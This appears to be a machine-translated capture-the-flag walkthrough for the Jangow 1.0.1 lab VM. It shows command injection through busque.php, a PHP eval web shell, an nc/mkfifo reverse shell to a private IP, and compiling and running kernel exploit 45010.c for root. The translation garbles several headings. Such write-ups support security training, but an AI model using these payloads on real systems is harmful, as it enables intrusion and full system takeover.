Catalog

One 、 information gathering

nmap scanning

Two 、web penetration

  Look for function points

Write a word Trojan

3、 ... and 、 exploit victory

Search for sensitive files

Four 、 Elevated privileges

Bounce shell

  Raise the right

  Ant sword upload ​ edit

  5、 ... and 、 Get flag

Remember a kali The double card IP Don't show problems

One 、 information gathering

Jangow1.0.1 Drone aircraft IP：192.168.56.118
kali attack IP：    192.168.56.102

The start is for IP Of

nmap scanning

 Get the open port and service of the target host 

Two 、web penetration

  Look for function points

 go in site file , Discover function points 
http://192.168.56.118/site/busque.php?buscar=
 Try command execution whoami
http://192.168.56.118/site/busque.php?buscar=whoami
 It is found that the command can be executed 
 Check the password file 
cat/etc/passwd

  But you can only view files , Can't log in . The next step is needed

Write a word Trojan

 Write a word Trojan 
echo '<?php @eval ($_POST["123"]);?>' >>shell.php

 Ant sword connection 

3、 ... and 、 exploit victory

Search for sensitive files

Four 、 Elevated privileges

  Some files do not have permission to view , Do permission promotion 

 Bounce shell

<?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.128 443 >/tmp/f');?>

Bounce shell

Rebound success

 upgrade shell, Become interactive 
python3 -c 'import pty;pty.spawn("/bin/bash")'

uname -a
 Get version number 

  Raise the right

 According to the system version 
searchsploit ubuntu 4.4.0

 use 45010.c This document carries out the right raising 

 The ant sword uploads the file to the target plane 

 Download link 
https://gitee.com/jewels/Privilege-Escalation/repository/archive/master.zip

  Ant sword upload

gcc 45010.c -o exp // Generate executable files 

chmod +x exp // Add executable rights 

./exp   // perform exp file 

 Get into root Catalog 
 Find files 

  5、 ... and 、 Get flag